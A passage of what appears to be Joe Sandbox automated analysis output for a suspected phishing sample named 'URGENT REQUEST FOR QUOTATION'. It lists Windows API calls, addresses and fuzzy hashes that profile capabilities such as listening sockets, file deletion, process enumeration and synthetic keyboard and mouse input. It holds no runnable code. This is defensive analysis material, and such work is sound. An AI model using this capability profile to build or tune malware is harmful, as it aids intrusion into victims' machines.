                                                                                                                      • Instruction Fuzzy Hash: A501F972B10211AFFF64A7B4DC86FFF72ACA714750F150521FD13E21D2D9A55C40A190
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000B1276
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1283
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B12BA
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B12C5
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 000B12F4
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 000B1303
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B130D
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 000B133C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 540024437-0
                                                                                                                      • Opcode ID: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                                                      • Instruction ID: 5b8665cc20aae47c41514f0cb18bce74db9faca1c94caa50ca62f9064ff440aa
                                                                                                                      • Opcode Fuzzy Hash: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                                                      • Instruction Fuzzy Hash: 91417271A001009FE710DF64C494FAABBE6AF46318F588198D85A9F293C775ED85CBE1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D420
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D470
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D481
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D498
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D4A1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                      • Opcode ID: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                                                      • Instruction ID: 090d73cf2960befda32fbb480a62d5f7a3204a30c38a7741a450837f80c5f10f
                                                                                                                      • Opcode Fuzzy Hash: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                                                      • Instruction Fuzzy Hash: 76317C710483459BD701EF64D8918EFB7ECAF92310F444A1EF4D5921A2EB20AA09DB63
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __floor_pentium4
                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                      • Opcode ID: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                                                      • Instruction ID: cb51005c52b24984d30575d61d7a292c269593a44ef73ec8cee98cf77b3e3851
                                                                                                                      • Opcode Fuzzy Hash: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                                                      • Instruction Fuzzy Hash: A5C24A71E086298FDB65CE28DD407EAB7F6EB48305F1441EAD84EE7241E774AE858F40
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 000A64DC
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000A6639
                                                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A6650
                                                                                                                      • CoUninitialize.OLE32 ref: 000A68D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: 0137db23d9c11fbf19af475cc070211ca889728817bc6f04e15a845056fc5e31
                                                                                                                      • Instruction ID: a755369f84d5491f7ba026bce21061fa6cef6d1fa8dea5a07605ee30286083da
                                                                                                                      • Opcode Fuzzy Hash: 0137db23d9c11fbf19af475cc070211ca889728817bc6f04e15a845056fc5e31
                                                                                                                      • Instruction Fuzzy Hash: 13D16971508201AFD315EF64C881EABB7E8FF95304F04496DF5958B292EB71ED09CB92
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 000B22E8
                                                                                                                        • Part of subcall function 000AE4EC: GetWindowRect.USER32(?,?), ref: 000AE504
                                                                                                                      • GetDesktopWindow.USER32 ref: 000B2312
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2319
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000B2355
                                                                                                                      • GetCursorPos.USER32(?), ref: 000B2381
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000B23DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2387181109-0
                                                                                                                      • Opcode ID: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                                                      • Instruction ID: f6961c7161b0a8e59cb3a3178754536a94e0950b047ac11fd4dab9a4df171e76
                                                                                                                      • Opcode Fuzzy Hash: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                                                      • Instruction Fuzzy Hash: 0731D072504315AFEB20DF54C849F9BB7E9FF88710F000A19F98997191DB35EA09CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000A9B78
                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000A9C8B
                                                                                                                        • Part of subcall function 000A3874: GetInputState.USER32 ref: 000A38CB
                                                                                                                        • Part of subcall function 000A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000A9BA8
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000A9C75
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1972594611-438819550
                                                                                                                      • Opcode ID: 51d6630d17d4e26b334d53907cd1deb236152e5a348696019a074df61c5ab9bf
                                                                                                                      • Instruction ID: f0e7e3bf6669153aa9e87861b77d67e6d30c823efee9c4c7c670f47e27be0657
                                                                                                                      • Opcode Fuzzy Hash: 51d6630d17d4e26b334d53907cd1deb236152e5a348696019a074df61c5ab9bf
                                                                                                                      • Instruction Fuzzy Hash: D4418271A0460A9FDF55DFA4CD85EEEBBF8EF06310F248155E905A6192EB309E84CF60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00049A4E
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00049B23
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00049B36
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$LongProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3131106179-0
                                                                                                                      • Opcode ID: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                                                      • Instruction ID: b5f28a87c658d71f3e75c828daae8e0a27486c26938d81607ab5dd5660d5276a
                                                                                                                      • Opcode Fuzzy Hash: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                                                      • Instruction Fuzzy Hash: 6EA13AF0108404BEE778BB2C8C48EBF36DDEB42350B254239F546D6A96CA25DD51C3BA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000B185D
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1884
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B18DB
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B18E6
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 000B1915
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1601658205-0
                                                                                                                      • Opcode ID: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                                                      • Instruction ID: c6f4e12f4ff35de1769cdcdb6063e8ee02445b1538d0e7144c7e13066591265a
                                                                                                                      • Opcode Fuzzy Hash: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                                                      • Instruction Fuzzy Hash: 9851C8B5A002006FEB11AF24C896FAA77E5AF44718F54845CFA09AF3D3CB75AD41CB91
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                                                      • Instruction ID: 37815dcc9fd267c7b3c9e21cf9a43a1d7ccac5de30655a3ee541405882940c53
                                                                                                                      • Opcode Fuzzy Hash: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                                                      • Instruction Fuzzy Hash: E52180317402105FE7208F1AC884FAE7BE5AF96315F19806CE84A8B352C775DC42CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                      • API String ID: 0-1546025612
                                                                                                                      • Opcode ID: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                                                      • Instruction ID: b25fbd320c6b070b9df1cd388857161e1e38493ccc591583acc686938daf4fee
                                                                                                                      • Opcode Fuzzy Hash: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                                                      • Instruction Fuzzy Hash: 75A28E70E0061ACBDF75CF58C8457EEB7B5BB44310F24C1A9E81AA7281EB759E81CB94
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000BA6AC
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 000BA6BA
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 000BA79C
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA7AB
                                                                                                                        • Part of subcall function 0004CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00073303,?), ref: 0004CE8A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1991900642-0
                                                                                                                      • Opcode ID: 97e595f027aea2ea5d1ef416ec89c2e42fda7c11fafe5872c0f3778d55668d60
                                                                                                                      • Instruction ID: fb2b02e498359e295122868607da3899b03e45c1556c59e0dfb1d3081c8c549e
                                                                                                                      • Opcode Fuzzy Hash: 97e595f027aea2ea5d1ef416ec89c2e42fda7c11fafe5872c0f3778d55668d60
                                                                                                                      • Instruction Fuzzy Hash: E25160B1508301AFD710DF25C886EABBBE8FF89754F40892DF58997252EB71D904CB92
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0009AAAC
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0009AAC8
                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0009AB36
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0009AB88
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                                                                                                      • Instruction ID: 709c7c5738494f01ddce2079a20e8e3f67f2b4d746163255f78d8cca070c6f3b
                                                                                                                      • Opcode Fuzzy Hash: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                                                                                                      • Instruction Fuzzy Hash: DA311830B40208AFFF358B69CC05BFE7BE6AB46320F04421AF585561D2D7749981E7E2
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 0006BB7F
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • GetTimeZoneInformation.KERNEL32 ref: 0006BB91
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,0010121C,000000FF,?,0000003F,?,?), ref: 0006BC09
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00101270,000000FF,?,0000003F,?,?,?,0010121C,000000FF,?,0000003F,?,?), ref: 0006BC36
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 806657224-0
                                                                                                                      • Opcode ID: c4d8e7d039230eee71b0c19ec030d1aafeee24db4f60882e36033cbd6ec22ad8
                                                                                                                      • Instruction ID: 95e3f956c5ac76f7d89ae480d1e2799e793c2e6509c68e82485a17e41bff39a5
                                                                                                                      • Opcode Fuzzy Hash: c4d8e7d039230eee71b0c19ec030d1aafeee24db4f60882e36033cbd6ec22ad8
                                                                                                                      • Instruction Fuzzy Hash: 9331F3B1904205EFCB21DF69CC8087DBBFAFF5576072442AAE090D72A2D7B49E81CB50
                                                                                                                      APIs
                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 000ACE89
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 000ACEEA
                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 000ACEFE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 234945975-0
                                                                                                                      • Opcode ID: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                                                      • Instruction ID: 3195a8257061a49819b6bc06c5f455b35058b98fc0a8b5f2c08c483d3dd7451e
                                                                                                                      • Opcode Fuzzy Hash: d23279e1de64e41131eb44f19a57856ecfddb4a662bfed659f2004e0ed00d00a
                                                                                                                      • Instruction Fuzzy Hash: B8218C71500705AFFB70DFA5C948FAB77F8EB41354F11442AE64692152E774EE08CB90
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,00075222), ref: 0009DBCE
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0009DBDD
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009DBEE
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0009DBFA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
